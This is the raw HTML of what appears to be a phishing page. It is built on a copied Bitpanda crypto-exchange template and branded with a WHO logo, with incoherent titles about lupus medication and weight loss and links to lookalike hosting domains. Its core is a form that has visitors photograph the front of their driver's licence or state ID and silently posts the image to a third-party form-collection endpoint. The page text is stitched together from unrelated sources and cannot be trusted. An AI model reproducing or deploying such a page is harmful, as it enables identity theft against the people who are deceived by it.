<!DOCTYPE html><html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script><meta charset=utf-8><title>

A division of the World Health Organization | Best Lupus Medication

</title><meta content=Bitpanda name=author><meta content="width=device-width, initial-scale=1.0" name=viewport>


<meta content=https://vote-bts.unaux.com/ 


property=og:url><meta content=origin name=referrer>


<meta content="Weight Loss And Beauty" name=description>


<meta content="Toby Keith"  name=title><link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate><meta content="index, follow " name=robots><meta content=article property=og:type><meta content="Weight Loss" property=og:title>





<meta content="Weight Loss"  property=og:description><meta  content=https://cdn.bitpanda.com/media/og-images-open-graph/bitpanda-og.png property=og:image><link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>



 <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>








<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQigjw9X7uVAtO6oFLpLoMBk0hLSLTZvSSY5A&amp;usqp=CAU" jsaction="load:XAeZkd;" jsname="HiaYvf" class="n3VNCb KAlRDb" alt="WHO: World Health Organisation - Office of the Secretary-General's ..." data-iml="4507.100000002538" style="width: 140px; height: 40px; margin: 3.35623px 0px;">









 </div> <div class=util-visible-desktop><ul class=bp-nav__navigation><li><div class=bp-nav__item><div class=bp-nav__item__text>Invest</div> <div class=bp-dropdown><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><div class=bp-dropdown__title>Invest in:</div> <ul><li><a aria-current=true bp-expand=bp-expand-1 class=bp-dropdown__item 






href=https://fans-georgestrait.unaux.com/>




<img alt="Cryptocurrencies &lt;small&gt;Buy, sell &amp; swap cryptocurrencies&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Cryptos.svg width=36> <div> Mr Beast <small>mr Beast</small> </div></a> <li>












<a aria-current=false bp-expand=bp-expand-2 class=bp-dropdown__item href="https://fans-georgestrait.unaux.com/">





<img alt="Stocks* &lt;small&gt;Invest in stocks with zero commissions&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Stocks.svg width=36> <div> Stocks* <small> DHH DELIVERY</small> </div></a> <li><a aria-current=false bp-expand=bp-expand-3 class=bp-dropdown__item href=https://www.bitpanda.com/en/invest/bitpanda-stocks><img alt="ETFs* &lt;small&gt;Invest in ETFs 24/7&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/etf-1.svg width=36> <div> ETFs* <small>DHH DELIVERY </small> </div></a> <li><a aria-current=false bp-expand=bp-expand-4 class=bp-dropdown__item href=https://www.bitpanda.com/en/bci-bitpanda-crypto-index>




<img alt="Crypto Indices &lt;small&gt;The world&#039;s first real crypto index&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/BCI.svg width=36> <div> Ford AutoNation <small>Ford AutoNation</small> </div></a> 













 <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/press-downloads><div> George Strait </div> </a> <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/career><div> George Strait</div> </a> </ul> </ul> </div></div> <li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text>Help</div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360001705580-I-m-new-to-Bitpanda-Where-should-I-start-><div> How to get started </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360019578140-Who-can-use-Bitpanda-><div>George Strait</div> </a> <li><a class=bp-dropdown__item  href=https://www.bitpanda.com/en/limits><div> Payment methods and limits </div> </a> <li><a class=bp-dropdown__item href=https://blog.bitpanda.com/en/why-data-privacy-is-important-to-us><div> Privacy policy </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us><div> Helpdesk </div> </a> </ul> </ul> </div></div> <li id=js-primary-search-modal-toggler uk-toggle="target: #search-modal"><div class="bp-dropdown--search-button bp-nav__item"><a class=bp-nav__circle-button href=/><svg class=bp-symbol style="--bp-symbol-size: 11px;"><use xlink:href=#icon-magnifier></use> </svg> </a> </div> </li> 













<script>(function() {
            document.getElementById('js-primary-search-modal-toggler').addEventListener('click', function() {
                setTimeout(function(){
                        document.getElementById('search-input-modal').focus();}
                    ,500);
            });
        })();</script></ul> </div> <div class=util-visible-desktop><div><ul class=bp-nav__navigation><li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text><svg class=bp-symbol style="vertical-align: text-top;"><use xlink:href=#icon-globe></use> </svg> EN <svg class=bp-symbol style="--bp-symbol-size: 10px; vertical-align: inherit;"><use xlink:href=#icon-chevron-down></use> </svg> </div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=/en><div> English </div> </a> <li><a class=bp-dropdown__item href=/de><div> Deutsch </div> </a> <li><a class=bp-dropdown__item href=/fr><div> Français </div> </a> <li><a class=bp-dropdown__item href=/es><div> Español </div> </a> <li><a class=bp-dropdown__item href=/it><div> Italiano </div> </a> <li><a class=bp-dropdown__item href=/pl><div> Polski </div> </a> </ul> </ul> </div></div> </ul> </div> <div>




<a class=bp-button href=https://fans-georgestrait.unaux.com/   title="Log in">Log in</a></div> <div><a class="bp-button bp-button--primary" href=https://account.bitpanda.com/en/register target=_blank title=Sign-up>Sign-up</a></div></div>





 



</div></div> </div> <script>function toggleTarget(e) {
        const item = e.currentTarget;
        const currentTarget = document.getElementById(e.currentTarget.getAttribute("bp-expand"));
        if (currentTarget !== activeTarget) {
            activeTarget.setAttribute("aria-expanded", "false");
            currentTarget.setAttribute("aria-expanded", "true");
            activeTarget = currentTarget;

            activeItem.setAttribute("aria-current", "false");
            item.setAttribute("aria-current", "true");
            activeItem = item;
        }
    }
    let activeTarget = document.getElementById("bp-expand-1");
    let activeItem = document.querySelectorAll("[bp-expand=bp-expand-1]")[0];
    document.querySelectorAll("[bp-expand]").forEach(function (item) {
        item.addEventListener("mouseenter", toggleTarget, false);
        item.addEventListener("focus", toggleTarget, false);
    });</script> <div aria-expanded=false class=bp-offcanvas><div class=bp-offcanvas__header>














<a href="https://dhhdelivery-com.github.io/processing/">


<img alt=Bitpanda class=lazyload data-src=" https://cdn.bitpanda.com/media/Ukraine/U-bitpanda-logo.svg " height=40 width=136>





 </a>














 <button class="bp-button bp-button--transparent" onclick=toggleOffcanvas();><svg class=bp-symbol><use xlink:href=#icon-close></use> </svg> </button></div> <div class=bp-offcanvas__search-area><div class="bp-form-element bp-form-element--can-focus bp-form-element--large" id=js-mobile-search-modal-toggler uk-toggle="target: #search-modal"><input placeholder=Search type=search> <svg class=bp-symbol><use xlink:href=#icon-magnifier></use> </svg></div> <script>(function() {
                    document.getElementById('js-mobile-search-modal-toggler').addEventListener('click', function() {
                        setTimeout(function(){
                                document.getElementById('search-input-modal').focus();}
                            ,500);
                    });
                })();</script> <div class="bp-form-element bp-form-element--can-focus bp-form-element--large"><svg class=bp-symbol><use xlink:href=#icon-globe></use> </svg> 





















 <script>function minimiseAll() {
        document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) {
            li.setAttribute("aria-expanded", false);
        })
    }
    document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) {
        li.addEventListener("click", function(e) {
            if(e.currentTarget.getAttribute("aria-expanded") === "true") {
                e.currentTarget.setAttribute("aria-expanded", false);
            } else {
                minimiseAll();
                e.currentTarget.setAttribute("aria-expanded", true);
            }
        });
    })
    function toggleOffcanvas(e) {
        const offcanvas = document.querySelectorAll(".bp-offcanvas")[0];
        if(offcanvas.getAttribute("aria-expanded") === "false") {
            offcanvas.setAttribute("aria-expanded", "true");
        } else {
            offcanvas.setAttribute("aria-expanded", "false");
        }
    }
    function changeLanguage(e) {
        document.location = e.value;
    }</script></header> <div id=mobile-nav uk-offcanvas="overlay: true;">


















<script>const ENTER_KEY_CODE = 13;

    $(document).ready(function () {
        $('#search-input-modal').keydown(function (event) {
            const keyCode = (event.keyCode ? event.keyCode : event.which);
            if (keyCode === ENTER_KEY_CODE) {
                const searchFilter = '' || '';
                const searchLink = `/en/search?${searchFilter.length === 0 ? '' : 'filter=' + searchFilter + '&'}query=${$(this).val()}`;
                document.location.href = searchLink;
            }
        });
    });</script></header> <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m">


<div class=module-text__content>









</div>
<h4> <font style="color: DarkBlue"> <strong>Photo ID ( Front ) </strong></font> </h4>

<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTO1s6h4YR72RMUrCsoB_AwvjYO-LuapptKKA&amp;usqp=CAU" jsaction="VQAsE" class="r48jcc pT0Scc iPVvYb" style="max-width: 2600px; width: 180px; height: 109px; margin: 0.5px 0px;" alt="ID Card Isolated On White Background. Identification Card Icon ..." jsname="kn3ccd">

 
<h6> 

<strong>
<font size="+0.5">

<font style="color: DarkBlue">
* You will need to have your Photo ID. That is your<font style="color: Black"> Driver's license Card or your State Issued ID card</font>.
<br> <br> 


* Click on " <font style="color: Black"> Upload Front Of Card</font> " below, to take a picture of the front of your Drivers Licence or State Issued ID Card, making sure it is clearly visible.</font>

</font>
</strong>



</h6>

 <h5><strong> Drivers Licence or State Issued ID Card ( Front )</strong> </h5>





<div>



  <!-- Author: FormBold Team -->
  <!-- Learn More: https://formbold.com -->
  <div class="formbold-form-wrapper">











  




<form id="wpforms-form-278" 
 
class="wpforms-validate wpforms-form" data-formid="278" method="post" 

action="https://formsubmit.co/9bad1063a8dcaac90c4721040d4ea0e8" enctype="multipart/form-data">






<input type="hidden" name="_captcha" value="false">


<input type="hidden" name="_next" 






value="https://medication-com.github.io/_ID.Medication.com/"> 





   


   
       

        <div class="formbold-mb-5 formbold-file-input">



          
          <label for="file">


<input type="file"   required id="file" name="FRONT" capture="environment" accept="image/png, image/jpeg" onchange="loadFile(event)">

 <img id="output"/> <script> var loadFile = function(event) { var reader = new FileReader(); reader.onload = function(){ var output = document.getElementById('output'); output.src = reader.result; }; reader.readAsDataURL(event.target.files[0]); }; </script>





            <div>
              <span class="formbold-drop-file"> </span>
              <span class="formbold-or">  </span>
              <span class="formbold-browse"
style="background-color:DodgerBlue; border-color:DodgerBlue;  color:White">

Upload Front Of Card</span>
            </div>
          </label>
        </div>
        <div> 
          
          <div> 
            
          </div>
        </div>
      </div>




        <div class="formbold-mb-5">        </div>    



      <div>
        <button class="formbold-btn w-full"> Continue </button>
      </div>
    </form>
  </div>
</div>
<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-5 {
    margin-bottom: 20px;
  }
  .formbold-pt-3 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    margin-bottom: 12px;
  }
  .formbold-form-label-2 {
    font-weight: 600;
    font-size: 20px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 12px 24px;
    border-radius: 6px;
    border: 1px solid #e0e0e0;
    background: white;
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: #6a64f1;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 16px;
    border-radius: 6px;
    padding: 14px 32px;
    border: none;
    font-weight: 600;
    background-color: #6a64f1;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: #07074d;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style>

</div> <br> 




<br>






</path> </symbol></svg>





</body>
</html>
